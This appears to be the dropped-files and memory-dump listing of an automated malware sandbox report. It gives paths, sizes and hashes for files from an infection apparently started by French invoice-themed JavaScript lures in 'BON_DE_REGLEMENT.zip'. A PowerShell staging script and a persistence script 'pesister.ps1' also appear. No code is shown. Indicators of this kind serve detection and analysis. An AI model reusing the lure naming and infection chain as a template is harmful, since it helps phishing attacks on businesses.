84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8749e21d9d0a17dac32d5aa2027f7a75

SHA1
a5d555f8b035c7938a4a864e89218c0402ab7cde

SHA256
915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304

SHA512
c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
34d2c4f40f47672ecdf6f66fea242f4a

SHA1
4bcad62542aeb44cae38a907d8b5a8604115ada2

SHA256
b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33

SHA512
50fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
948ef22a908321c586a9ec32854392a6

SHA1
c956d677d727be4ab5e35e7511a79a42c38eadca

SHA256
606a0b60869ba5f5d40e09ae1e626c9044953d28f390f356cb3883b0c11ffe05

SHA512
72081c0fde6e057a6d7bc879ef4729fe13609dd421455f008fdd9fa67d8f70b27729d40219269a34ca7d7b73eeac004e3a4501b137597a5bebb2883ac6f3b07b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
43530ea477162c0124fcb76109360490

SHA1
397d03fd0522aea4462dbe350b2611dcec3b682b

SHA256
8480d39f06b2a4cffb7646ea6c96d2511edb45d137d852e08081b2227f7e8178

SHA512
074fb067063091f967e7e710039ca0f44a4ee847016ef6ffc4209523ea39a3984d912da9c1dea20739031e8f68968b769c2ac9e6466e277bf8a670c34a398844

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
92299a5b7e321d4716e75594e4eaa2ab

SHA1
882a9255f5de4eb1828f4051cfb0d1080ad343a8

SHA256
47431f846d8b98bdad9d47a942cb4e8e08fcab496db6e546395c9e5651d5c499

SHA512
6e324244babf34cd346b6f0e2fdd09bf93ddfae9fdd1df5eba10f6f908dabb1525e4e3b336ec1716c4391e8922e5debfbd1778809b24b46342f8527244f205e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7602d0bce8fcdb16aca943675cc1b283

SHA1
91127a754b9233da325f988f5463a4a47baf7148

SHA256
0ac0067bbc698fb3d6fe4865a46f4d7f0b03f81fd47b7a8df6444b777a8c5a89

SHA512
525926260629b085b511b8e041f72aa32d1f582f13209673fde7457646163bbc1b4c274623ec71872cc6eb5ab72343aed1e83972392cc19fc8672c20b604f0c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1e5b4bde4abea49246b711694f56fa87

SHA1
2df65140fb1e9311580c5e970d9512e64f20c660

SHA256
09528ae17e225eaff181b22c79cee93be276bdfc100b42a3d52022ca609bc04d

SHA512
a5e2bb9e1850a0ee5f60867a8eb0c9de468d72b3f30179f2cf01af57dda5f4bead0b2b739b75a8ea2d16e0d6870ffe197b9280d48a46a3e6225b823ae53aaf29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e9f8004232fb331220c9f1aa1e6353f9

SHA1
75e8b4217cc3fc07db4b180b407274f1c52c580b

SHA256
ed12dcb2b476cb171377dba6b304b4a8e85cd7ed7fefcf4ba7980fefd36f2806

SHA512
8eab1a15400ebd6997493fc0f803786952d80c7f2881664398fc3840b0c2a53d3c88f88fcc82ccf099c4d829226e4b40f3b2781d797407ec4bcff9374e89d1db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ad530d188e44f54d4e796ca6ca540dbe

SHA1
d0f890da43775856fa22a310cbb76ec73e9a5344

SHA256
26c152d2f8a4ed058800a38b194c0d101090459d72ddbc8492317e8926567e9d

SHA512
d7b51d3e3ebd09c94781640c734a8df018f25b8c0deb1cf26ee8be84b982e7bff1f7b54e7a0d14c2fb8446a0f7ed39c023d85cbc286abc865691c92bd3f5338f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
451310fe7e010cb7de9101ead19ff71b

SHA1
9ef414b4583669c458608c1cfa36feb88f569c47

SHA256
a6193f062f0afe67ec6f9b6609bbd4451462b04b0d9c7993e0d6f3884fa0078d

SHA512
dafede3ef8a0ed7827e3e8d071e1c92c7487659a41d7f02d5eddd62c0bc5bf4372d3e95e310bf96ad5fef094dbb1b5b9d9fe2b2b11935157095d502f0234d012

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
95e8ce5193ceddd736d55ca5c30cc0e2

SHA1
999a5168d4ceb2f83b47edd0026d47ede5f4d717

SHA256
c3e0475b5ee8dae4f0d8621f867af9b231ddb6d4c9ebea1925d05e84c858c1d2

SHA512
6d7572a0dafae3dcce5c439ce24f6ed1c82a54e474db10f45c75088da2686622d24fadc0b4dcb4cbbba6004245808ca1e18c96f48e9fc21ec0bab5ffc116912e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2979eabc783eaca50de7be23dd4eafcf

SHA1
d709ce5f3a06b7958a67e20870bfd95b83cad2ea

SHA256
006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

SHA512
92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0519459106533b0df8a275a6f94c0f4a

SHA1
e03399406d36f9fc0f6915fddea04d3161d7b8ee

SHA256
fe5d66fff70b85408516fa7bd462d37883c332fbc577baf8d3e957c412e3ae67

SHA512
7897ba61009666430e2ba5264b654b87fe4b0bc02d9a9f5091cce9ce6a63d54a398836579a5bb293b7262dd7f99deb58b6118da36f610d5d998082d306d05b32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
bed76c693a85593331422c025dec0375

SHA1
6cc9e17c29df42b09a8fe20eaced4c4ec8e78f3b

SHA256
99b2abf2ca372e58e3faf47cd719e48f3537bf82b0b0dd2435a65d19fbdc6cda

SHA512
d4d1fa36ac16a57cf25848d6c5767c974017c119e2fefc74ef6579ea244aeca95d8ec125bba549daf0074db774ec3e499d1ab2d6dc78c93719ac1ec0dd3bf538

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0064fb6f0c20d97ea673e6a70fb926fa

SHA1
4adf014ea2c8928dfb30e1569e4e049340e39ef5

SHA256
8fa3577a744008765531abc0139b5532c88177d5a84f9b1b7755537f270b4433

SHA512
0977bd116830fc00f44306c88d608d39eef13c54911dbabc9b21a5b87af9409408a06d0f91182249e53733b6dceb260369241ef73a99d1cf04f5d86b7bc9a522

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bd84a249acecea9fba0df3d01b8305c0

SHA1
c7161dbd390d2d64925a9f987b1e41f42eca1d4d

SHA256
aea560ffda4a850a53cda513f0b5b50322563d52690fe5b07764615638d8e160

SHA512
d8897507207440daada3ff7ff33976bac8281dea68424174c799bd4b68e0358bab395246c0f1d4c13328d7f478b218ab9e1be8959b32f28a1eeba199c746f676

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
917e795d1789a69a3537beb9e2609380

SHA1
b0107f48c9ed3714568829736e5e37506923dfb4

SHA256
4203857ee755a23026e5978ca0b2449acfcb54b42d62eb374dd71010aa1ce692

SHA512
85f538128ae61a137a3a93f46938b3d06eee2b1bf37e16a5090302b1e48c2b36f79cc7bf8f34a6eb462005c0f06a146e777bc6de3f449f6d2d85266afdda7b97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8247cc009050d398facc3d20697476c3

SHA1
adf99f6c2227c79234760622e63c379a394ad07d

SHA256
1fd562c77589b3507df10342d30f075341bf92610250fd0c364324ab1f0b081c

SHA512
7a4af6374c8b55a628865cd70b263c16939a71ceb70649b19b825568d4cb48e953fb4a8d839e6bbccdaac131500a47dd12549c1ec8ed22b78b355bb19f97c545

Download Submit
C:\Users\Admin\AppData\Local\Temp\DLL01.txt

Filesize
31B

MD5
44933644bd65016bca7b39c9ea78c1ad

SHA1
84317b9ee130b7b6ba0cb25fda31527453352bbf

SHA256
de2f713cac74b61b89d400ab388452bb948e6b709a41203d4591a57b7272d92b

SHA512
9692ebf88ed5d844bfb2e6c77addd32116ca49eca6e1a66ba1b67d06cd29ed66d4f50a46fb7e8c947f22d0b61fb42a2f1d4fd8865e79c1729c101cdadff3e442

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rqb31qqp.szi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
58KB

MD5
f91fc6d798370c2babe3d901ca52f575

SHA1
cae7d51cfb341acee678bdf8fdc4f98c50a778ce

SHA256
daf05c9c7d1123926265600e912688af5739c121002016933a2da7a249a04983

SHA512
0156e7dbd1fd87b3c62dbccd3afd0ee3491ef2ba24c7f173d728d157300bbd00199e71c0f95f715f8cacb8ba7ac209575dc6012dd5b296fafa7e6bb92d71a0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
852B

MD5
761ac8fbccf61b29ebf52171d20b5461

SHA1
004e99efaf55f84e355ba64c186cd30a3c5e99ac

SHA256
36265372ddb757cc32f8fafc1260cbe6ba04804aadd917a542e9ff9f3432de0b

SHA512
ea34b01fead372e2631552296cf46daa068a154a687cd60d0708ea2945bbb963f12d0dba12ebec52395220d424971eb3287398ee5794c4ea054df81609c496a4

Download Submit
C:\Users\Admin\AppData\Roaming\pesister.ps1

Filesize
231B

MD5
09759a51393bbdc9afe2762fe9a61f4a

SHA1
731aa16e7339bd9f6c24e4ea0313d517fb337bf2

SHA256
9b4a035a1418397e354a991369f7c994cffdcf2cb3a706aa5f4469df4d84b0c4

SHA512
6125670453f654fddf43e07658f704c8fd5015a55761cf3598bd8d698e77515d5988568a5562561a212c533fe409be3367a3878ff4f2012eb020cb6f43afd062

Download Submit
C:\Users\Admin\Downloads\BON_DE_REGLEMENT.zip

Filesize
14KB

MD5
b46dd2046273ea63f0bccb67ed7720c3

SHA1
0f2736d28aded2f7360c01c1eadc8efb378043f7

SHA256
de53202272c8fa84952fb031aa79ddfed7f2d7fba6496e73845fd25b3636e054

SHA512
e4374dada59ffe5d8f809e15ba6ee62b5f77eb2f7ac506bc82672a369fb05d6971e51f7d6a429716bc3889f47181b2d5e815d0f297e200574155f7a967b4d2cf

Download Submit
C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js

Filesize
199KB

MD5
9feff1a23db299a128f16bc6091df793

SHA1
2041542fb6ddc259c2888d587f75a06947d6c0dc

SHA256
67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9

SHA512
6de1016f37d3df9d6b428b19076ea34fe2e9db0bbe09aa9bbaa637237b8130b47fd119bb39274ec618b3e4238ccbf53a4e7a562e2c9c714b73c6392a6a1102c2

Download Submit
C:\Users\Admin\Downloads\BON_DE_REGLEMENT\ORDRE_VIREMENT.js

Filesize
196KB

MD5
732ebfc90707323a1e006ce3b8d46e90

SHA1
1c35db18d06c39d4bb7fda270d88f4ca821fdc0d

SHA256
a626b6bc8236958dc84cd64fe6aaeca41e4b00c9395e41d116fbc27a8b17343d

SHA512
f35dca01250535c0afd9e73bda02c7c18b4df539de574eb640ae06ff69791e78d5b22b7dd04e7e14f8f7ec5e5c31bcc000f7df63501e6a220286d2ba96b0d9f9

Download Submit
memory/8-262-0x0000027999410000-0x000002799957A000-memory.dmp

Filesize
1.4MB

Download
memory/224-362-0x000001E5F0730000-0x000001E5F073A000-memory.dmp

Filesize
40KB

Download
memory/800-185-0x00000127407A0000-0x00000127407C2000-memory.dmp

Filesize
136KB

Download
memory/4056-240-0x0000027A3B050000-0x0000027A3B05A000-memory.dmp

Filesize
40KB

Download
memory/5388-310-0x000002889B9B0000-0x000002889BB1A000-memory.dmp

Filesize
1.4MB

Download
memory/5828-266-0x00000202EF000000-0x00000202EF16A000-memory.dmp

Filesize
1.4MB

Download
memory/5832-298-0x000001CDFF360000-0x000001CDFF4CA000-memory.dmp

Filesize
1.4MB

Download
memory/5920-373-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/5920-375-0x0000000005990000-0x0000000005A2C000-memory.dmp

Filesize
624KB

Download
memory/5920-390-0x0000000006200000-0x00000000067A4000-memory.dmp

Filesize
5.6MB

Download
memory/5920-391-0x0000000005CF0000-0x0000000005D82000-memory.dmp

Filesize
584KB

Download
memory/5920-392-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/5920-393-0x00000000061F0000-0x00000000061FA000-memory.dmp

Filesize
40KB

Download
memory/5920-422-0x0000000007D10000-0x0000000007D1E000-memory.dmp

Filesize
56KB

Download